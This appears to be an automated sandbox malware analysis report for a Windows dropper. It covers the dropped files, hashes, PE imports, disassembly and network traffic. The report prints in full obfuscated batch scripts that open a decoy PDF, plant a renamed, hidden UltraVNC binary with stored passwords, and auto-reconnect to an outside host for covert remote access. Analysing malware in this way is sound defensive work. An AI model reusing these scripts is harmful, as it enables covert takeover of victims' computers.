Preview:	@echo off.setlocal enabledelayedexpansion.set QEy79=browser_sn.set Mkr26=co.set ReO81=nhost.set dUEeo=443.set wP5sf=%COMPUTERNAME%.set LtQEq=co.set Eqm2m=nne.set wapw9=ct.set Gruna=tbdcic.info.set oSLdS=exe.set jSEQA=autore.set HaGkC=194.87.252.28.timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_Jd0Qd -%LtQEq%%Eqm2m%%wapw9% %Gruna%:443.timeout /t 4.exit.

C:\Windows\Tasks\9655269573

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	1001
Entropy (8bit):	5.502266483327757
Encrypted:	false
SSDEEP:	24:g5byOTMorMKXGw+kMLz2NcflizT/P2bkAMlvRx/m:IOOBrMKx8TMzL9vx/m
MD5:	A99AF3E2449A048C4436329C1AF6F48F
SHA1:	06C2CB982455A7A2FCB76AE70D7C3ED6871361DA
SHA-256:	B3571E56EB1A88188B2CE9AC1E67F429E7D949D09528437A7F32689A2371CC78
SHA-512:	C8AD6E74A0C8D29538042FDC429547AD0FB7E8F96B3E5E59644EFA6837BF243E31A3193F2B385316421730733330F346498044EFC62BA152AC79FC7CD9C7A559
Malicious:	false
Preview:	@echo off.setlocal enabledelayedexpansion.set ReO81=nhost.set Eqm2m=nne.set LtQEq=co.set oSLdS=exe.set Tnd6s=Lom.set uXzAr=pdf.set Fl8oQ=raVNC.set wP5sf=%COMPUTERNAME%.set jSEQA=autore.set TNi7V=%WINDIR%\Tasks\3889122.cmd.set Gruna=tbdcic.info.set IXrxR=Jd0Qd.set M6Juw=443.set Mkr26=co.set wapw9=ct.set D7rq9=Ult.set QEy79=browser_sn.set Fr9ND=ini.timeout /t 1.copy "DygIR.vkc0f" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%" & start "" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%".timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.copy "Xv6Ya.d8LhT" "%QEy79%.%oSLdS%".timeout /t 1.copy "go3uE.OUJMA" "%D7rq9%%Fl8oQ%.%Fr9ND%".timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_%IXrxR% -%LtQEq%%Eqm2m%%wapw9% %Gruna%:%M6Juw%.timeout /t 2.copy "uqVb3.kkb9h" "%Mkr26%%ReO81%.%oSLdS%".timeout /t 4.:loop.if exist "%TNi7V%" (. cmd /c "%TNi7V%". timeout /t 600. goto :loop.) else (. timeout /t 42. goto :loop.).

C:\Windows\Tasks\9655269573.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	1001
Entropy (8bit):	5.502266483327757
Encrypted:	false
SSDEEP:	24:g5byOTMorMKXGw+kMLz2NcflizT/P2bkAMlvRx/m:IOOBrMKx8TMzL9vx/m
MD5:	A99AF3E2449A048C4436329C1AF6F48F
SHA1:	06C2CB982455A7A2FCB76AE70D7C3ED6871361DA
SHA-256:	B3571E56EB1A88188B2CE9AC1E67F429E7D949D09528437A7F32689A2371CC78
SHA-512:	C8AD6E74A0C8D29538042FDC429547AD0FB7E8F96B3E5E59644EFA6837BF243E31A3193F2B385316421730733330F346498044EFC62BA152AC79FC7CD9C7A559
Malicious:	false
Preview:	@echo off.setlocal enabledelayedexpansion.set ReO81=nhost.set Eqm2m=nne.set LtQEq=co.set oSLdS=exe.set Tnd6s=Lom.set uXzAr=pdf.set Fl8oQ=raVNC.set wP5sf=%COMPUTERNAME%.set jSEQA=autore.set TNi7V=%WINDIR%\Tasks\3889122.cmd.set Gruna=tbdcic.info.set IXrxR=Jd0Qd.set M6Juw=443.set Mkr26=co.set wapw9=ct.set D7rq9=Ult.set QEy79=browser_sn.set Fr9ND=ini.timeout /t 1.copy "DygIR.vkc0f" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%" & start "" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%".timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.copy "Xv6Ya.d8LhT" "%QEy79%.%oSLdS%".timeout /t 1.copy "go3uE.OUJMA" "%D7rq9%%Fl8oQ%.%Fr9ND%".timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_%IXrxR% -%LtQEq%%Eqm2m%%wapw9% %Gruna%:%M6Juw%.timeout /t 2.copy "uqVb3.kkb9h" "%Mkr26%%ReO81%.%oSLdS%".timeout /t 4.:loop.if exist "%TNi7V%" (. cmd /c "%TNi7V%". timeout /t 600. goto :loop.) else (. timeout /t 42. goto :loop.).

C:\Windows\Tasks\DygIR.vkc0f

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PDF document, version 1.5 (zip deflate encoded)
Category:	dropped
Size (bytes):	605114
Entropy (8bit):	7.931189302613814
Encrypted:	false
SSDEEP:	12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
MD5:	A18D0E3EEEF0D6E099BAB52F8B041446
SHA1:	4879750BEC07AA11629950310AF538E9A9D91D20
SHA-256:	95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
SHA-512:	6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
Malicious:	false
Preview:	%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:\|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi.....T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

C:\Windows\Tasks\UltraVNC.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	Generic INItialization configuration [admin]
Category:	dropped
Size (bytes):	858
Entropy (8bit):	5.233343202654504
Encrypted:	false
SSDEEP:	24:z/h28nCi2vMQg9KgJhuXNTxYgMei3MAKJ/nn:rh28nC2/KgJOr8eTx/n
MD5:	C55EEA597023B8C774986495ECAE5B33
SHA1:	279315CE36021D2C86AE97EBFAA528749FA89544
SHA-256:	75490184E52519B37CC1DF17AF419C260BD50575C57FFA46366A877E4FC57ACA
SHA-512:	D838DA28246C21A3A9920E05B2E5AA58321F5C08D5F18B0F372E9436641977E9A33585706A85A7F84116F27B456C5589E4D2235CB8E178F824483493F508989B
Malicious:	false
Preview:	[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=50..KeepAliveInterval=6..SocketKeepAliveTimeout=12000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0341C75FCAEB31BD2..passwd2=F2409C75FCAEB22BD2..

C:\Windows\Tasks\Xv6Ya.d8LhT

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1945368
Entropy (8bit):	6.532894678367002
Encrypted:	false
SSDEEP:	24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
MD5:	749B3A68B9C5325D592822EE7C2C17EC
SHA1:	3EDE6BB2DF969432358A5883CF226971FDE8B7D4
SHA-256:	F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
SHA-512:	B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\Xv6Ya.d8LhT, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......\|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......\|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

C:\Windows\Tasks\browser_sn.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1945368
Entropy (8bit):	6.532894678367002
Encrypted:	false
SSDEEP:	24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
MD5:	749B3A68B9C5325D592822EE7C2C17EC
SHA1:	3EDE6BB2DF969432358A5883CF226971FDE8B7D4
SHA-256:	F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
SHA-512:	B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\browser_sn.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......\|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......\|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

C:\Windows\Tasks\conhost.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	867840
Entropy (8bit):	6.386550733462827
Encrypted:	false
SSDEEP:	12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
MD5:	0F568F6C821565AB9FF45C7457953789
SHA1:	F948A4C5E01A74B17D0F966615834BA76DC1BADC
SHA-256:	CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
SHA-512:	B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

C:\Windows\Tasks\go3uE.OUJMA

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	Generic INItialization configuration [admin]
Category:	dropped
Size (bytes):	858
Entropy (8bit):	5.233343202654504
Encrypted:	false
SSDEEP:	24:z/h28nCi2vMQg9KgJhuXNTxYgMei3MAKJ/nn:rh28nC2/KgJOr8eTx/n
MD5:	C55EEA597023B8C774986495ECAE5B33
SHA1:	279315CE36021D2C86AE97EBFAA528749FA89544
SHA-256:	75490184E52519B37CC1DF17AF419C260BD50575C57FFA46366A877E4FC57ACA
SHA-512:	D838DA28246C21A3A9920E05B2E5AA58321F5C08D5F18B0F372E9436641977E9A33585706A85A7F84116F27B456C5589E4D2235CB8E178F824483493F508989B
Malicious:	false
Preview:	[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=50..KeepAliveInterval=6..SocketKeepAliveTimeout=12000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0341C75FCAEB31BD2..passwd2=F2409C75FCAEB22BD2..

C:\Windows\Tasks\uqVb3.kkb9h

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	867840
Entropy (8bit):	6.386550733462827
Encrypted:	false
SSDEEP:	12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
MD5:	0F568F6C821565AB9FF45C7457953789
SHA1:	F948A4C5E01A74B17D0F966615834BA76DC1BADC
SHA-256:	CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
SHA-512:	B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9513802823208
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	T8xrZb7nBL.exe
File size:	1'670'955 bytes
MD5:	1677bd5b561b890396ae1816066ca481
SHA1:	9ba4b30a162a261b27397bc1dc3736b94b786f65
SHA256:	d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e
SHA512:	bac8a3d2e270caf1d00b812d480562ffced7a67d14ac45e1730fb94d5dadf7f5c5fb618133e35f4a7246d16fa53cbada05ea1671c2919973d0e9ccd4b3be3be7
SSDEEP:	24576:WKWs4Estw5N4jqjvXeBKNiVCK/A52aw08KdVUBRAWwPnA5jF0zF77/voe2D7UGxV:TFzseH4jYXeBExKYhd3Yb0zZoe2DNL
TLSH:	767523547793C9F4EA57227408A15C135FA3ED290A40288F33CDF6127A36652FA2BDB7
File Content Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...-..P.................2...H....../8.......P....@.........................................................................$s.............................

File Icon


Icon Hash:	357561d6dad24d55

Static PE Info

General

Entrypoint:	0x41382f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x50E0002D [Sun Dec 30 08:49:49 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1d1577d864d2da06952f7affd8635371

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00416E98h
push 004139C0h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [004151DCh]
pop ecx
or dword ptr [0041B9E4h], FFFFFFFFh
or dword ptr [0041B9E8h], FFFFFFFFh
call dword ptr [004151E0h]
mov ecx, dword ptr [004199C4h]
mov dword ptr [eax], ecx
call dword ptr [004151E4h]
mov ecx, dword ptr [004199C0h]
mov dword ptr [eax], ecx
mov eax, dword ptr [004151E8h]
mov eax, dword ptr [eax]
mov dword ptr [0041B9E0h], eax
call 00007F24F9217BE2h
cmp dword ptr [00419780h], ebx
jne 00007F24F9217ACEh
push 004139B8h
call dword ptr [004151ECh]
pop ecx
call 00007F24F9217BB4h
push 00419050h
push 0041904Ch
call 00007F24F9217B9Fh
mov eax, dword ptr [004199BCh]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [004199B8h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [004151F4h]
push 00419048h
push 00419000h
call 00007F24F9217B6Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17324	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1c000	0x309f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x364	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x130f0	0x13200	a86014994324ad6f47bddf386fd89176	False	0.6081495098039216	data	6.614408281478693	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x3560	0x3600	9abc217bd20b39b1db2f57ddf9bc789c	False	0.4381510416666667	data	5.5938980842785995	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x29ec	0x800	4c129856aeef51c872b4a2f6db01e9bd	False	0.44580078125	data	3.8126171673069433	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1c000	0x309f0	0x30a00	64273c62ea7bfbe17a6e55349807dc90	False	0.7267683563624678	data	7.231510619965348	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1c280	0x18de	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Russian	Russia	0.9696826892868363
RT_ICON	0x1db60	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Russian	Russia	0.08974964572508266
RT_ICON	0x21d88	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Russian	Russia	0.12935684647302906
RT_ICON	0x24330	0x1a68	Device independent bitmap graphic, 40 x 80 x 32, image size 6720	Russian	Russia	0.16553254437869822
RT_ICON	0x25d98	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Russian	Russia	0.21106941838649157
RT_ICON	0x26e40	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Russian	Russia	0.29508196721311475
RT_ICON	0x277c8	0x6b8	Device independent bitmap graphic, 20 x 40 x 32, image size 1680	Russian	Russia	0.33313953488372094
RT_ICON	0x27e80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Russian	Russia	0.4592198581560284
RT_GROUP_ICON	0x282e8	0x76	data	Russian	Russia	0.7457627118644068
RT_VERSION	0x28360	0x350	data			0.4693396226415094
RT_MANIFEST	0x286b0	0x33c	ASCII text, with CRLF line terminators	English	United States	0.501207729468599

Imports

DLL	Import
COMCTL32.dll
SHELL32.dll	SHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
GDI32.dll	CreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
ADVAPI32.dll	FreeSid, AllocateAndInitializeSid, CheckTokenMembership
USER32.dll	GetMenu, SetWindowPos, GetWindowDC, ReleaseDC, CopyImage, GetKeyState, GetWindowRect, ScreenToClient, GetWindowLongW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, EndDialog, SendMessageW, wsprintfW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, CreateWindowExW, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, MessageBoxA, GetParent
ole32.dll	CreateStreamOnHGlobal, CoCreateInstance, CoInitialize
OLEAUT32.dll	SysAllocString, VariantClear, OleLoadPicture
KERNEL32.dll	SetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, GetStartupInfoA
MSVCRT.dll	??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _wtol, _purecall

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 13:29:33.273130894 CET	49749	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:29:33.273165941 CET	443	49749	194.190.152.201	192.168.2.7
Dec 23, 2024 13:29:33.273317099 CET	49749	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:29:33.273444891 CET	49749	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:29:33.273456097 CET	443	49749	194.190.152.201	192.168.2.7
Dec 23, 2024 13:29:33.273518085 CET	443	49749	194.190.152.201	192.168.2.7
Dec 23, 2024 13:29:33.403105974 CET	49750	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:29:33.403153896 CET	443	49750	194.190.152.201	192.168.2.7
Dec 23, 2024 13:29:33.407547951 CET	49750	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:29:33.407547951 CET	49750	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:29:33.407588005 CET	443	49750	194.190.152.201	192.168.2.7
Dec 23, 2024 13:29:33.407675028 CET	443	49750	194.190.152.201	192.168.2.7
Dec 23, 2024 13:29:49.974590063 CET	49792	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:29:49.974632978 CET	443	49792	194.190.152.201	192.168.2.7
Dec 23, 2024 13:29:49.974740028 CET	49792	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:29:49.974967957 CET	49792	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:29:49.974991083 CET	443	49792	194.190.152.201	192.168.2.7
Dec 23, 2024 13:29:49.975033045 CET	443	49792	194.190.152.201	192.168.2.7
Dec 23, 2024 13:29:50.101797104 CET	49793	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:29:50.101825953 CET	443	49793	194.190.152.201	192.168.2.7
Dec 23, 2024 13:29:50.102608919 CET	49793	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:29:50.102701902 CET	49793	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:29:50.102714062 CET	443	49793	194.190.152.201	192.168.2.7
Dec 23, 2024 13:29:50.102865934 CET	443	49793	194.190.152.201	192.168.2.7
Dec 23, 2024 13:30:01.223735094 CET	49819	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:30:01.223762989 CET	443	49819	194.190.152.201	192.168.2.7
